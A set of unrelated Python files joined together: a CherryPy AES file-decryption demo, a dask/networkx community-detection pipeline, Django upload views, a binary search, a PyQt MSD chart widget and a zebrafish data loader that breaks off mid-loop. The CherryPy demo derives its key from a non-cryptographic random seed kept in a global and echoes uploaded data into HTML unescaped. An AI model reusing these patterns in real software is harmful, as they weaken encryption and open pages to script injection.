        return HttpResponse("failed ... ")
    # this method will add a record in the table
    form.save()
    return HttpResponse('success')
|
import os
import os.path
import random
import string
import cherrypy
import base64
from pyparsing import unicode
from Crypto.Hash import SHA256
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad, unpad
LETTERS = string.ascii_uppercase
seed_number = ""
class StringGenerator(object):
    """CherryPy app: serves a random seed number, accepts an AES-encrypted
    upload, and decrypts it with a key derived from that seed."""

    @cherrypy.expose
    def index(self):
        """Landing page with a button that generates a random seed."""
        return """
        <html>
        <head><title>Random Seed Generator</title></head>
        <body>
        <h1>Seed Number</h1>
        <form action="generate_submitPage" method="get">
        Generate Random Number:<input type="submit" />
        </form>
        <p1> Click Button for Generate Random Seed Number
        </body>
        </html>"""

    def AES_Decrypt(self, upload_file, seed_number):
        """Decrypt an uploaded file.

        Layout: the first 16 bytes are the IV; the remainder is
        base32-encoded AES-CBC ciphertext. Key = SHA256(seed)[:16].
        """
        # FIX: read via a context manager so the file handle is closed
        # (the original leaked an anonymous open()).
        with open(upload_file, "rb") as f:
            received_data = f.read()
        IV = received_data[:16]  # leading 16 bytes carry the IV
        print("IV:", IV)
        key_AES = SHA256.new(''.join(seed_number).encode()).digest()[:16]  # derive the key from the seed value
        cipher_AES = AES.new(key_AES, AES.MODE_CBC, IV)
        decrypted_msg = unpad(cipher_AES.decrypt(base64.b32decode(received_data[16:])), AES.block_size)
        return decrypted_msg.decode()

    @cherrypy.expose
    def upload_AES_File(self, myFile):
        """Store the uploaded ciphertext as saved_AES.bin, decrypt it with the
        current seed, and show both raw and decrypted data as HTML."""
        global seed_number
        # upload_path = '/path/to/project/data/'
        upload_path = os.path.dirname(__file__)  # directory to store the upload in
        # the uploaded file is always saved under the name 'saved_AES.bin'
        upload_filename = 'saved_AES.bin'
        upload_file = os.path.normpath(os.path.join(upload_path, upload_filename))
        size = 0
        html_out_text = ""
        with open(upload_file, 'wb') as out:
            while True:
                data = myFile.file.read(8192)
                if not data:
                    break
                out.write(data)
                html_out_text += unicode(data)
                print(data)
                size += len(data)
        decrypted_message = self.AES_Decrypt(upload_file, seed_number)  # run the AES decryption routine
        webpage_output = """
        <html>
        <h1>OK. Received File...</h1>
        <p>Let's Decrypt File...
        <p>Filename: {}
        <p>Length: {}
        <p>Mime-type: {}
        <p>Received Data: {}
        <p>
        <p>
        <p>Decrypted Data: {}
        </html>
        """.format(myFile.filename, size, myFile.content_type, html_out_text, decrypted_message)
        # return the result --> rendered as HTML in the browser
        return webpage_output

    @cherrypy.expose
    def generate_submitPage(self):
        """Generate a new 8-character hex seed and show the upload form."""
        global seed_number
        seed_number = random.sample(string.hexdigits, 8)
        return """
        <html>
        <head><title>Random Seed Generator</title></head>
        <body>
        <h1>Seed Number</h1>
        <p1>{}
        <h2>Upload a file</h2>
        <form action="upload_AES_File" method="post" enctype="multipart/form-data">
        filename: <input type="file" name="myFile" /><br />
        <input type="submit" />
        </form>
        <h2>Download a file</h2>
        </body>
        </html>""".format(''.join(seed_number))

    @cherrypy.expose
    def about(self):
        """Static about page."""
        return """
        <html>
        <head><title>About Us</title></head>
        <body>
        <h1>About Us</h1>
        <p1> This is our first class python using cherrypy. </p1>
        </body>
        </html>
        """
if __name__ == '__main__':
    #
    # Execution order (and logic)
    # Server : run cherrypy_AES_with_OTP_WebServer.py
    # Server : click http://127.0.0.1:8080 to open the web page
    # Client : click the 'Generate' button on the page to create a seed number
    # Client : run cherrypy_AES_with_OTP_Client.py
    # Client : paste the generated seed number and press Enter --> creates encrypted_data_AES_for_Upload.bin
    # Client : upload encrypted_data_AES_for_Upload.bin via the web page
    # Server : automatically decrypts the uploaded file and displays the result
    # Server : stores the uploaded file as saved_AES.bin
    cherrypy.quickstart(StringGenerator())
    cherrypy.engine.exit()
import dask.bag as db
import networkx as nx
import pandas as pd
import time
import json
import community
import collections
import matplotlib.pyplot as plt
from dask.distributed import Client, LocalCluster
from karateclub import EgoNetSplitter
def not_none(edge):
    """Filter predicate: keep only edges that parsed successfully."""
    return not (edge is None)
def parse_edge(edge):
    """Parse a split CSV row into (src_id, dst_id, timestamp), or None.

    FIX: also catch IndexError so rows with too few fields are dropped by
    the downstream filter instead of crashing the pipeline.
    """
    try:
        return (int(edge[0]), int(edge[1]), pd.to_datetime(edge[2]))
    except (ValueError, IndexError):
        # malformed row: non-numeric ids, unparseable date, or missing fields
        return None
def make_grouper(period):
    """Build a pair of closures for `period`-second time windows.

    grouper: edge -> (window index, src, dst); revert: (window index, x) ->
    (ISO timestamp of the window start, x).
    """
    epoch = pd.Timestamp('1970-01-01')

    def grouper(edge):
        seconds = (edge[2] - epoch).total_seconds()
        return seconds // period, edge[0], edge[1]

    def revert(tup):
        iso = pd.Timestamp(tup[0] * period, unit='s').isoformat()
        return (iso, tup[1])

    return grouper, revert
def get_components(t):
    """Detect communities in one time slice.

    `t` is a (timestamp, graph) pair. Tries overlapping ego-net splitting
    first and falls back to Louvain on failure. Returns
    (timestamp, [set of member nodes per community]).

    BUG FIX: both branches previously did ``communities[node].add(group)``,
    producing sets of community *ids* keyed by node (with Louvain every set
    was a singleton id), while `flatten` emits these sets as 'nodes'.
    Group member nodes by community id instead.
    """
    # components = list(nx.connected_components(t[1]))
    # return t[0], components
    G = t[1]
    communities = collections.defaultdict(set)
    try:
        model = EgoNetSplitter()
        model.fit(G)
        partition = model.get_memberships()  # node -> iterable of community ids
        for node, groups in partition.items():
            for group in groups:
                communities[group].add(node)
    except Exception:  # FIX: was a bare except (swallowed KeyboardInterrupt too)
        communities = collections.defaultdict(set)  # discard any partial result
        partition = community.community_louvain.best_partition(G)  # node -> community id
        for node, group in partition.items():
            communities[group].add(node)
    return t[0], list(communities.values())
def combine_edges_to_graph(G: nx.Graph, edge):
    """Fold step: return a copy of G with one weighted edge added.

    `edge` is a ((window, src, dst), weight) pair; copying presumably avoids
    mutating the shared initial accumulator passed to foldby.
    """
    updated = G.copy()
    (_, src, dst), weight = edge
    updated.add_edge(src, dst, weight=weight)
    return updated
def graph_combine(G1: nx.Graph, G2: nx.Graph):
    """Merge two weighted graphs, summing the weights of shared edges."""
    w1 = {(u, v): w for u, v, w in G1.edges(data='weight')}
    w2 = {(u, v): w for u, v, w in G2.edges(data='weight')}
    merged = nx.Graph()
    for key in set(w1) | set(w2):
        merged.add_edge(key[0], key[1], weight=w1.get(key, 0) + w2.get(key, 0))
    return merged
def flatten(group):
    """Expand one (timestamp, components) pair into per-component records."""
    timestamp, components = group
    return [{'timestamp': timestamp, 'nodes': list(members)} for members in components]
def find_components(inpath="data/02_normalize/*.csv", outpath="data/03_find_components/*.ndjson", period=24 * 60 * 60):
    """Slice the edge stream into `period`-second windows, build one weighted
    graph per window, detect its communities, and write them as NDJSON.

    Side effects: writes a diagnostic plot/edgelist for the first window and
    records `period` in data/meta/period.txt -- "<INVALID>" is written first
    and only replaced on success, so a crash leaves an explicit marker.
    """
    with open("data/meta/period.txt", "w+") as f:
        f.write("<INVALID>")
    lines = db.read_text(inpath)
    edges = lines.str.strip().str.split(',')
    edges = edges.map(parse_edge).filter(not_none)
    key, revert = make_grouper(period)
    # Count occurrences of each (window, src, dst) triple -> edge weights.
    sliced_weighted_edges = edges.foldby(key, lambda x, _: x + 1, 0, lambda x, y: x + y, 0).repartition(30)
    # Fold each window's weighted edges into one networkx graph.
    slices = sliced_weighted_edges.foldby(lambda x: x[0][0], combine_edges_to_graph, nx.Graph(), graph_combine,
                                          nx.Graph())
    slices = slices.repartition(12).persist()
    # store the first graph for diagnostics
    example_ts, example_G = slices.take(1)[0]
    weights = [e[2] for e in example_G.edges(data='weight')]
    weights = [w/max(weights) for w in weights]  # normalize for edge coloring
    nx.write_edgelist(example_G, "diagnostics/03_find_components/network_structure.txt")
    nx.draw_circular(example_G, with_labels=False, node_size=20, edge_color=weights)
    plt.title(example_ts)
    plt.savefig("diagnostics/03_find_components/network_structure.png")
    # compute connected components
    components = slices.map(get_components)
    flattened_components = components.map(flatten).flatten()
    flattened_components.map(json.dumps).to_textfiles(outpath)
    # Success: replace the sentinel with the actual period.
    with open("data/meta/period.txt", "w+") as f:
        f.write(str(period))
if __name__ == '__main__':
    # NOTE(review): 12 workers x 166GB memory_limit assumes a very large
    # machine; tune to the host actually running the pipeline.
    cluster = LocalCluster(n_workers=12, threads_per_worker=1, memory_limit='166GB')
    client = Client(cluster)
    print(f"Serving on {client.dashboard_link} with {client.cluster}")
    start = time.time()
    find_components()
    print(f"Ran in {time.time() - start:.2f}s")
|
from django.shortcuts import render
from .models import MyForm, MyImage
from django.views.generic import FormView
from PIL import Image
class MyImages(FormView):
    """Image-upload form plus a gallery of all previously stored images."""
    form_class = MyForm
    template_name = 'ex00/my_images.html'
    initial = {'key': 'value'}
    success_url = 'my_images'

    def get(self, request):
        """Render an empty upload form together with every stored image."""
        # FIX: dropped a leftover debug print and an unused local that
        # shadowed the `form_class` class attribute.
        form = self.form_class(initial={'key': 'value'})
        files = MyImage.objects.all()
        return render(request, self.template_name, {'form': form, 'files': files})

    def post(self, request):
        """Validate the submitted form, store the image, and re-render."""
        form = self.form_class(request.POST, request.FILES)
        files = MyImage.objects.all()
        if not form.is_valid():
            return render(request, self.template_name, {'form': form, 'files': files})
        title = form.cleaned_data.get('title')
        img = form.cleaned_data.get('img')
        MyImage(title=title, img=img).save()
        return render(request, self.template_name, {'form': form, 'files': files})
|
import random
def busqueda_binaria(valor, datos=None):
    """Binary search over a sorted sequence; return the index or None.

    Generalized: `datos` is an optional sorted sequence to search. When
    omitted it falls back to the module-level `lista`, preserving the
    original call signature.
    """
    if datos is None:
        datos = lista
    inicio = 0
    final = len(datos) - 1
    while inicio <= final:
        puntero = (inicio + final) // 2
        if valor == datos[puntero]:
            return puntero
        elif valor > datos[puntero]:
            inicio = puntero + 1
        else:
            final = puntero - 1
    return None


def buscar_valor(valor, datos=None):
    """Return a human-readable message for where (or whether) `valor` occurs.

    FIX: compare against None with `is`, not `==`.
    """
    res_busqueda = busqueda_binaria(valor, datos)
    if res_busqueda is None:
        return f"El numero {valor}, no se encuentra"
    else:
        return f"El numero {valor}, se encuentra en la posicion {res_busqueda}"
# Storing the result in res_busqueda means the search runs only once; calling
# busqueda_binaria(valor) again in the message would repeat the whole search.
if __name__ == '__main__':
    # Build the module-level sorted list the search functions rely on.
    tamano_de_lista = int(input('De que tamano es la lista? '))
    valor = int(input('Que numero quieres encontrar? '))
    lista = sorted([random.randint(0, 100) for i in range(tamano_de_lista)])
    print(buscar_valor(valor))
    print(lista)
|
import PyQt5.QtCore as QtCore
import PyQt5.QtGui as QtGui
from PyQt5.QtSvg import QSvgGenerator
from PyQt5.QtWidgets import QMainWindow, QAction, QFileDialog, QSizePolicy, QSplitter, QTableWidget, QTableWidgetItem
from PyQt5.QtGui import QPen, QColor, QBrush
from PyQt5.QtCore import QSize
from PyQt5.QtChart import QChart, QChartView, QSplineSeries, QValueAxis, QScatterSeries
import numpy as np
from cellphy.Analysis import Track, Channel
from .VTKWidget import VTKWidget
class LineSeries(QSplineSeries):
    """Spline series bound to a Track: clicking re-emits the track through
    `selected`; hovering thickens the pen and restores it on leave."""
    selected = QtCore.pyqtSignal(Track)
    def __init__(self, x, y, track, color, name, parent=None):
        QSplineSeries.__init__(self, parent)
        self.clicked.connect(self.__selected)
        self.hovered.connect(self.highlight)
        self.track = track
        self.old_pen = None  # pen saved while the hover highlight is active
        self.y = np.array(y)
        self.x = np.array(x)
        self.setColor(QColor(color[0], color[1], color[2], 255))
        self.setPen(QPen(QBrush(self.color()), 2))
        self.setName(name)
        # Populate the series with the (x, y) points.
        for i, p in enumerate(self.y):
            self.append(self.x[i], p)
    def __selected(self):
        # Re-emit the click as a typed signal carrying the backing track.
        self.selected.emit(self.track)
    def highlight(self, _, state):
        """Hover handler: swap in a thicker black pen; restore on leave."""
        if state:
            self.old_pen = self.pen()
            self.setPen(QPen(QtCore.Qt.black, self.old_pen.width()+2))
        elif not state and self.old_pen is not None:
            self.setPen(self.old_pen)
class ScatterSeries(QScatterSeries):
    """Scatter series bound to a Track (transparent fill, colored border);
    same click/hover behavior as LineSeries."""
    selected = QtCore.pyqtSignal(Track)
    def __init__(self, x, y, track, color, name, parent=None):
        QScatterSeries.__init__(self, parent)
        self.clicked.connect(self.__selected)
        self.hovered.connect(self.highlight)
        self.track = track
        self.old_pen = None  # pen saved while the hover highlight is active
        self.y = np.array(y)
        self.x = np.array(x)
        # Alpha 0 fill: only the border color identifies the marker.
        self.setColor(QColor(color[0], color[1], color[2], 0))
        self.setPen(QPen(QBrush(self.color()), 2))
        self.setBorderColor(QColor(color[0], color[1], color[2], 255))
        self.setMarkerSize(10)
        self.setName(name)
        # Populate the series with the (x, y) points.
        for i, p in enumerate(self.y):
            self.append(self.x[i], p)
    def __selected(self):
        # Re-emit the click as a typed signal carrying the backing track.
        self.selected.emit(self.track)
    def highlight(self, _, state):
        """Hover handler: swap in a thicker black pen; restore on leave."""
        if state:
            self.old_pen = self.pen()
            self.setPen(QPen(QtCore.Qt.black, self.old_pen.width() + 2))
        elif not state and self.old_pen is not None:
            self.setPen(self.old_pen)
class ChartView(QChartView):
    """Chart view with a fixed preferred size and SVG export support."""

    def __init__(self, parent=None):
        QChartView.__init__(self, parent)

    def sizeHint(self):
        # Preferred size used during Qt layout negotiation.
        return QSize(400, 400)

    def save_svg(self):
        """Prompt for a destination and render the current scene to an SVG file."""
        file, _ = QFileDialog.getSaveFileName(self, "Save Dialog for Export SVG", QtCore.QDir.homePath(), "SVG (*.svg)")
        if not file:
            return
        # FIX: renamed the typo'd local `target_react` and removed a stray
        # trailing semicolon; behavior is unchanged.
        target_rect = QtCore.QRectF(0.0, 0.0, self.sceneRect().size().width(), self.sceneRect().size().height())
        svg_generator = QSvgGenerator()
        svg_generator.setFileName(file)
        svg_generator.setSize(self.sceneRect().size().toSize())
        svg_generator.setViewBox(self.sceneRect())
        painter = QtGui.QPainter(svg_generator)
        self.render(painter, target_rect, self.sceneRect().toRect())
        painter.end()
class ChartViewWrapper(QMainWindow):
    """Hosts a ChartView as the central widget with a toolbar offering SVG export."""
    def __init__(self, parent=None):
        QMainWindow.__init__(self, parent)
        self.chart_view = ChartView()
        self.setCentralWidget(self.chart_view)
        self.tool_bar = self.addToolBar('MSDToolBar')
        save_image_action = QAction('Export SVG', self)
        save_image_action.triggered.connect(self.chart_view.save_svg)
        self.tool_bar.addAction(save_image_action)
    def sizeHint(self):
        # Preferred size used during Qt layout negotiation.
        return QSize(400, 400)
class MSDWidget(QMainWindow):
    """Window showing MSD curve-fit charts for a set of tracks, optionally with
    a VTK 3-D view and an alfa summary table.

    Emits ``msd_line_clicked`` with the clicked Track whenever a chart series
    is selected.
    """

    msd_line_clicked = QtCore.pyqtSignal(Track)

    def __init__(self, source_list, title, change_color=True, vtk_on=True, show_alfa_table=False, parent=None):
        """Accept a Channel/Track (or a list of them) and build the sub-widgets.

        change_color: recolor fit lines by alfa class (yellow/cyan/magenta).
        vtk_on: also render the tracks in a VTK widget.
        show_alfa_table: also show an AlfaWidget summary table.
        """
        QMainWindow.__init__(self, parent)
        self.vtk_on = vtk_on
        self.show_alfa_table = show_alfa_table
        self.setWindowTitle(title)
        self.title = title
        self.change_color = change_color
        self.central_widget = QSplitter(self)
        self.setCentralWidget(self.central_widget)
        # Accept a bare Channel/Track as well as a list of them.
        if type(source_list) is not list:
            source_list = [source_list]
        assert type(source_list[0]) in [Channel, Track]
        if type(source_list[0]) is Channel:
            self.init_channels(source_list)
        else:
            if self.change_color:
                # Remember the original track color so scatter points keep it
                # while fit lines get recolored by alfa class.
                self.base_channel_color = source_list[0].color.copy()
            self.init_tracks(source_list)

    def init_channels(self, source_list):
        """Channel input is not implemented yet."""
        pass

    def init_tracks(self, source_list):
        """Build the chart / VTK / table widgets for tracks with enough samples."""
        # MSD fitting needs more than 3 time points to be meaningful.
        tracks = [track for track in source_list if len(track.time_position_map) > 3]
        msd_widget, msd_widget_velocity, alfa_all, alfa_lt_0_4, alfa_bt_0_4_1_2, \
            alfa_gt_1_2, alfa_gt_1_2_n, alfa_gt_1_2_v = self.get_msd_chart(tracks)
        # keeping this after MSD for change color to take effect
        if self.vtk_on:
            vtk_widget = self.get_vtk_widget(tracks)
            self.central_widget.addWidget(vtk_widget)
        if self.show_alfa_table:
            alfa_table_widget = AlfaWidget(alfa_all, alfa_lt_0_4, alfa_bt_0_4_1_2, alfa_gt_1_2, alfa_gt_1_2_n, alfa_gt_1_2_v)
            self.central_widget.addWidget(alfa_table_widget)
        self.central_widget.addWidget(msd_widget)
        if msd_widget_velocity is not None:
            self.central_widget.addWidget(msd_widget_velocity)

    def get_vtk_widget(self, tracks):
        """Return a VTKWidget with all tracks rendered (alfa-recolored when enabled)."""
        widget = VTKWidget(self)
        for track in tracks:
            if self.change_color:
                alfa, _ = track.basic_fit()
                widget.add_track(track, updated_color=self.get_alfa_color(alfa))
            else:
                widget.add_track(track)
        widget.render_lines()
        return widget

    def get_msd_chart(self, tracks):
        """Build the MSD charts and collect per-class alfa statistics.

        Returns a tuple: (msd_chart_wrapper, velocity_chart_wrapper_or_None,
        alfa_all, alfa_lt_0_4, alfa_bt_0_4_1_2, alfa_gt_1_2, alfa_gt_1_2_n,
        alfa_gt_1_2_v).
        """
        chart_view_wrapper = ChartViewWrapper(self)
        chart = QChart()
        chart.setTitle('Msd & Curve Fit')
        chart_v = QChart()
        chart_v.setTitle('Msd & Curve Fit with Velocity')
        max_y = []
        need_velocity = False
        alfa_all = []
        alfa_lt_0_4 = []
        alfa_bt_0_4_1_2 = []
        alfa_gt_1_2 = []
        alfa_gt_1_2_v = []
        alfa_gt_1_2_n = []
        for track in tracks:
            y = np.array(list(track.msd(limit=26)))
            max_y.append(y.max())
            # x axis in physical units; 3.8 is the per-step scale factor
            # (presumably the frame interval) -- TODO confirm.
            x = np.array(list(range(1, len(y) + 1))) * 3.8
            scattered_line = ScatterSeries(x, y, track, self.base_channel_color if self.change_color else track.color, track.name)
            scattered_line.selected.connect(self.msd_line_clicked)
            chart.addSeries(scattered_line)
            alfa, __y = track.basic_fit()
            alfa_all.append(alfa)
            line_series = LineSeries(x, __y, track, self.get_alfa_color(alfa) if self.change_color else track.color, track.name)
            line_series.selected.connect(self.msd_line_clicked)
            chart.addSeries(line_series)
            # Classify by alfa.  BUG FIX: values exactly equal to 0.4 or 1.2
            # previously fell into no bucket at all (the old tests were
            # < 0.4, 0.4 < a < 1.2, a > 1.2); boundaries now match
            # get_alfa_color.
            if alfa < 0.4:
                alfa_lt_0_4.append(alfa)
            elif 0.4 <= alfa <= 1.2:
                alfa_bt_0_4_1_2.append(alfa)
            elif alfa > 1.2:
                # Super-diffusive track: redo the fit with a velocity term
                # and plot it on the secondary chart.
                alfa_gt_1_2.append(alfa)
                _alfa, _velocity, _y = track.velocity_fit()
                alfa_gt_1_2_n.append(_alfa)
                alfa_gt_1_2_v.append(_velocity)
                _line_series = LineSeries(x, _y, track, self.get_alfa_color(alfa) if self.change_color else track.color, track.name)
                _line_series.selected.connect(self.msd_line_clicked)
                _scattered_line = ScatterSeries(x, y, track, self.base_channel_color if self.change_color else track.color, track.name)
                _scattered_line.selected.connect(self.msd_line_clicked)
                chart_v.addSeries(_line_series)
                chart_v.addSeries(_scattered_line)
                need_velocity = True
        # BUG FIX: guard against an empty track list (max() on empty raised).
        top = (max(max_y) + 20) if max_y else 20
        chart_view_wrapper.chart_view.setChart(chart)
        chart.createDefaultAxes()
        axis_x = QValueAxis()
        axis_x.setRange(0, 110)
        axis_x.setTickCount(10)
        axis_x.setLabelFormat("%.2f")
        chart.setAxisX(axis_x)
        axis_y = QValueAxis()
        axis_y.setRange(0, top)
        axis_y.setTickCount(10)
        axis_y.setLabelFormat("%.2f")
        chart.setAxisY(axis_y)
        chart_view_wrapper.chart_view.setRenderHint(QtGui.QPainter.Antialiasing)
        if len(tracks) > 2:
            # Too many tracks for a readable legend.
            chart.legend().setVisible(False)
        result = None
        if need_velocity:
            chart_view_w = ChartViewWrapper(self)
            chart_v.createDefaultAxes()
            axis_x_v = QValueAxis()
            axis_x_v.setRange(0, 110)
            axis_x_v.setTickCount(10)
            axis_x_v.setLabelFormat("%.2f")
            axis_y_v = QValueAxis()
            axis_y_v.setRange(0, top)
            axis_y_v.setTickCount(10)
            axis_y_v.setLabelFormat("%.2f")
            chart_v.setAxisX(axis_x_v)
            chart_v.setAxisY(axis_y_v)
            chart_view_w.chart_view.setChart(chart_v)
            chart_view_w.chart_view.setRenderHint(QtGui.QPainter.Antialiasing)
            result = chart_view_w
            if len(tracks) > 2:
                chart_v.legend().setVisible(False)
        return chart_view_wrapper, result, alfa_all, alfa_lt_0_4, alfa_bt_0_4_1_2, alfa_gt_1_2, alfa_gt_1_2_n, alfa_gt_1_2_v

    def get_alfa_color(self, alfa):
        """Map an alfa value to RGBA: yellow (<0.4), cyan (0.4-1.2), magenta (>1.2)."""
        yellow = [255, 255, 0, 128]
        cyan = [0, 183, 235, 128]
        magenta = [255, 0, 255, 128]
        if alfa < 0.4:
            return yellow
        elif 0.4 <= alfa <= 1.2:
            return cyan
        else:
            return magenta
class AlfaWidget(QMainWindow):
    """Table window listing alfa fit statistics by class, with CSV export."""

    track_clicked = QtCore.pyqtSignal(Track)
    display_msd_channel = QtCore.pyqtSignal(Channel)
    display_ied_channel = QtCore.pyqtSignal(Channel)

    def __init__(self, alfa, alfa_lt_0_4, alfa_bt_0_4_1_2, alfa_gt_1_2, alfa_gt_1_2_n, alfa_gt_1_2_v, parent=None):
        """Store the per-class alfa lists and build the table + export toolbar."""
        QMainWindow.__init__(self, parent)
        self.alfa = alfa
        self.alfa_lt_0_4 = alfa_lt_0_4
        self.alfa_bt_0_4_1_2 = alfa_bt_0_4_1_2
        self.alfa_gt_1_2 = alfa_gt_1_2
        self.alfa_gt_1_2_n = alfa_gt_1_2_n
        self.alfa_gt_1_2_v = alfa_gt_1_2_v
        self.table_widget = QTableWidget()
        self.tool_bar = self.addToolBar('Alfa ToolBar')
        self.setCentralWidget(self.table_widget)
        # Keep a reference on self so the QAction is not garbage collected.
        self.create_csv_act = QAction('Export')
        self.create_csv_act.triggered.connect(self.export_csv)
        self.tool_bar.addAction(self.create_csv_act)
        self.headers = ['Alfa', 'Alfa < 0.4', 'Alfa 0.4 <> 1.2', 'Alfa > 1.2', 'New Alfa >1.2', 'Velocity']
        self.prepare_table()

    def _fill_column(self, column, values):
        """Write *values* down table column *column*, growing the row count as needed."""
        for row, value in enumerate(values):
            if self.table_widget.rowCount() < row + 1:
                self.table_widget.setRowCount(row + 1)
            self.table_widget.setItem(row, column, QTableWidgetItem(str(value)))

    def prepare_table(self):
        """Populate one column per alfa statistic; columns may differ in length."""
        self.table_widget.setColumnCount(len(self.headers))
        self.table_widget.setHorizontalHeaderLabels(self.headers)
        # Column order matches self.headers.
        columns = [self.alfa, self.alfa_lt_0_4, self.alfa_bt_0_4_1_2,
                   self.alfa_gt_1_2, self.alfa_gt_1_2_n, self.alfa_gt_1_2_v]
        for column, values in enumerate(columns):
            self._fill_column(column, values)

    def export_csv(self):
        """Dump the table (headers + cells) to a user-chosen .csv file."""
        _csv = ','.join(self.headers) + '\n'
        for row in range(self.table_widget.rowCount()):
            row_vals = []
            for col in range(self.table_widget.columnCount()):
                item = self.table_widget.item(row, col)
                if item is not None:
                    row_vals.append(item.text())
            _csv += ','.join(row_vals) + '\n'
        file, _ = QFileDialog.getSaveFileName(self, "Save Curve Fit values .csv files",
                                              QtCore.QDir.homePath(), "CSV (*.csv)")
        # BUG FIX: a cancelled dialog returns an empty path; previously this
        # crashed on open('').  Also use a context manager so the handle is
        # always closed.
        if not file:
            return
        with open(file, 'w') as fd:
            fd.write(_csv)
# class MSDLineSeries(QSplineSeries):
# selected = QtCore.pyqtSignal(Track)
#
# def __init__(self, track, parent=None):
# QSplineSeries.__init__(self, parent)
# self.clicked.connect(self.__selected)
# self.hovered.connect(self.highlight)
# self.old_pen = None
# self.track = track
#
# self.y = np.array(list(track.msd(limit=26)))
# self.x = np.array(list(range(0, len(self.y) + 2))) * 3.8
#
# self.setColor(QColor(track.color[0], track.color[1], track.color[2], 255))
# self.setPen(QPen(QBrush(self.color()), 2))
# self.setName(track.name)
# for i, p in enumerate(self.y):
# self.append(self.x[i], p)
#
# def __selected(self):
# self.selected.emit(self.track)
#
# def highlight(self, _, state):
# if state:
# self.old_pen = self.pen()
# self.setPen(QPen(QtCore.Qt.black, self.old_pen.width()+2))
# elif not state and self.old_pen is not None:
# self.setPen(self.old_pen)
#
# def max_y(self):
# return self.y.max()
#
#
# class MsdChartWidget(QMainWindow):
# msd_line_clicked = QtCore.pyqtSignal(Track)
#
# def __init__(self, tracks, title=None, parent=None):
# QMainWindow.__init__(self, parent)
# self.title = title
# self.chart_view = QChartView(self)
#
# self.setCentralWidget(self.chart_view)
#
# self.tracks = tracks
# if type(tracks) is not list:
# self.tracks = [self.tracks]
#
# self.chart = QChart()
#
# self.max_y = []
#
# for track in self.tracks:
# if len(track.time_position_map) < 2:
# continue
# line_series = MSDLineSeries(track)
# line_series.selected.connect(self.msd_line_clicked)
# self.max_y.append(line_series.max_y())
# self.chart.addSeries(line_series)
#
# if len(self.tracks) < 3:
# name = '-'.join([str(n.track_id) for n in self.tracks])
# _title = f'MSD Analysis {name}'
# self.setWindowTitle(_title)
# self.chart.setTitle(_title)
# else:
# _title = self.title if self.title is not None else f'MSD Analysis'
# self.chart.setTitle(_title)
# self.chart.legend().setVisible(False)
# # self.chart.setAnimationOptions(QChart.SeriesAnimations)
#
# self.chart.createDefaultAxes()
#
# axis_x = QValueAxis()
# axis_x.setRange(0, 110)
# axis_x.setTickCount(10)
# axis_x.setLabelFormat("%.2f")
# self.chart.setAxisX(axis_x)
#
# axis_y = QValueAxis()
# axis_y.setRange(0, max(self.max_y)+20)
# axis_y.setTickCount(10)
# axis_y.setLabelFormat("%.2f")
# self.chart.setAxisY(axis_y)
#
# self.chart_view.setChart(self.chart)
# self.chart_view.setRenderHint(QtGui.QPainter.Antialiasing)
#
# self.tool_bar = self.addToolBar('MSDToolBar')
#
# self.setup_tool_bar()
# self.setSizePolicy(QSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding))
#
# def setup_tool_bar(self):
# save_image_action = QAction('Export SVG', self)
# save_image_action.triggered.connect(self.save_svg)
# self.tool_bar.addAction(save_image_action)
#
# def save_svg(self):
# file, _ = QFileDialog.getSaveFileName(self, "Save Dialog for Export SVG", QtCore.QDir.homePath(), "SVG (*.svg)")
#
# if not file:
# return
#
# target_react = QtCore.QRectF(0.0, 0.0, self.chart_view.sceneRect().size().width(), self.chart_view.sceneRect().size().height());
# svg_generator = QSvgGenerator()
# svg_generator.setFileName(file)
# svg_generator.setSize(self.chart_view.sceneRect().size().toSize())
# svg_generator.setViewBox(self.chart_view.sceneRect())
#
# painter = QtGui.QPainter(svg_generator)
# self.chart_view.render(painter, target_react, self.chart_view.sceneRect().toRect())
# painter.end()
#
# def sizeHint(self):
# return QSize(400, 400) |
from get_fish_info import get_fish_info
import pandas as pd
from pathlib import Path
import pylab as pl
import pickle
import numpy as np

# Root folder of the free-swimming dot-motion-coherence behavior data.
root_path = Path("/n/home10/abahl/engert_storage_armin/ariel_paper/free_swimming_behavior_data/dot_motion_coherence")

for experiment in ["chrna2a",
                   "disc1_hetinx",
                   "scn1lab_NIBR_20200708",
                   "scn1lab_zirc_20200710"]:

    # Each experiment ships a genotype spreadsheet with a slightly different
    # layout; normalize them all to 'fish_ID' / 'genotype' columns.
    if experiment == "chrna2a":
        fish_data = pd.read_excel(root_path / experiment / "genotype.xlsx", header=None)
        fish_data.columns = ['fish_ID', "genotype"]
    if experiment == "disc1_hetinx":
        fish_data = pd.read_excel(root_path / experiment / "genotype.xlsx", header=None)
        fish_data.columns = ['fish_ID', "genotype"]
    if experiment == "scn1lab_NIBR_20200708":
        fish_data = pd.read_excel(root_path / experiment / "genotype.xlsx", header=0)
        fish_data.columns = ['fish_ID', "pre_genotype", "genotype"]  # the post genotype is the correct one
    if experiment == "scn1lab_zirc_20200710":
        fish_data = pd.read_excel(root_path / experiment / "genotype.xlsx", header=0)
        fish_data.columns = ['fish_ID', "pre_genotype", "genotype"]
    print(fish_data)

    all_data = []
    numtrials = 30

    for i in range(len(fish_data)):
        fish_ID = fish_data.iloc[i]["fish_ID"]
        genotype = fish_data.iloc[i]["genotype"]

        # Normalize the various genotype spellings to wt/het/hom.
        if not isinstance(genotype, str):
            # e.g. NaN from an empty spreadsheet cell; the substring tests
            # below would raise TypeError on a non-string.
            print(fish_ID, genotype, "unknown genotype. Skipping.")
            continue
        if genotype == "wt" or "+/+" in genotype:
            genotype = 'wt'
        elif genotype == "ht" or "+/-" in genotype:
            genotype = 'het'
        elif genotype == "hm" or "-/-" in genotype:
            genotype = 'hom'
        else:
            print(fish_ID, genotype, "unknown genotype. Skipping.")
            # BUG FIX: the message promised to skip, but the loop previously
            # fell through and processed the fish with its raw genotype label.
            continue

        for trial in range(0, numtrials):
            print(experiment, fish_ID, genotype, trial)
            try:
                # Trials are numbered consecutively; stop at the first
                # missing/unreadable trial file for this fish.
                with open(root_path / experiment / fish_ID / "raw_data" / f"trial{trial:03d}.dat", 'rb') as f:
                    data = pickle.load(f)
            except (OSError, EOFError, pickle.UnpicklingError):
                break

            for stim in range(8):
                bout_times = data[f"bouts_start_stimulus_{stim:03d}"]["timestamp"]
                bout_xs = data[f"bouts_start_stimulus_{stim:03d}"]["fish_position_x"]
                bout_ys = data[f"bouts_start_stimulus_{stim:03d}"]["fish_position_y"]
                bout_start_fish_accumulated_orientation = data[f"bouts_start_stimulus_{stim:03d}"][
                    "fish_accumulated_orientation"]
